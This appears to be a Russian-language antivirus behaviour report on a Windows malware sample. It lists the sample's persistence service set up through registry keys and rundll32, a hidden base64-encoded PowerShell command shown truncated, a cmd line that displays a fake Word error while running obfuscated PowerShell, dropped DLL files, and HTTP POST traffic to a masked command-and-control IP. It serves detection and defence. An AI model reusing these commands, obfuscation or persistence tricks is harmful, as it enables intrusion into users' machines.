Техническая информация
Для обеспечения автозапуска и распространения
Устанавливает следующие настройки сервисов
- [<HKLM>\System\CurrentControlSet\Services\mrnun.eug] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\mrnun.eug] 'ImagePath' = '%WINDIR%\SysWOW64\rundll32.exe "%WINDIR%\SysWOW64\Zdqftn\mrnun.eug",Control_RunDLL'
Создает следующие сервисы
- 'mrnun.eug' %WINDIR%\SysWOW64\rundll32.exe "%WINDIR%\SysWOW64\Zdqftn\mrnun.eug",Control_RunDLL
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -ENCOD cwBFAFQALQBpAFQARQBNACAAIAB2AGEAcgBJAEEAYgBsAGUAOgBrADYASQAgACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsANAB9AHsAMgB9AHsAMwB9AHsAMAB9ACIAIAAtAGYAJwBUAE8AUgBZACcA...
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\d9e9u9i\ffnhdak\a05d.dll
Удаляет следующие файлы
- %WINDIR%\syswow64\zdqftn\mrnun.eug
Перемещает следующие файлы
- %HOMEPATH%\d9e9u9i\ffnhdak\a05d.dll в %WINDIR%\syswow64\zdqftn\mrnun.eug
Сетевая активность
Подключается к
- '12#.#.215.60':80
TCP
Запросы HTTP GET
- http://cr#.#ectigo.com/SectigoRSADomainValidationSecureServerCA.crt
Запросы HTTP POST
- http://12#.#.215.60/k9fj4kvw7/suljb6m3p/i9z3te5qb2q9/3thu64clj/fqd4k6f9snzmnttsk67/dd2v2k8/
UDP
- DNS ASK ob#b.tv
- DNS ASK cr#.#ectigo.com
Другое
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD cwBFAFQALQBpAFQARQBNACAAIAB2AGEAcgBJAEEAYgBsAGUAOgBrADYAS...
- '<SYSTEM32>\msg.exe' user /v Word experienced an error trying to open the file.
- '<SYSTEM32>\rundll32.exe' %HOMEPATH%\D9e9u9i\Ffnhdak\A05D.dll Control_RunDLL
- '%WINDIR%\syswow64\rundll32.exe' "%WINDIR%\SysWOW64\Zdqftn\mrnun.eug",Control_RunDLL
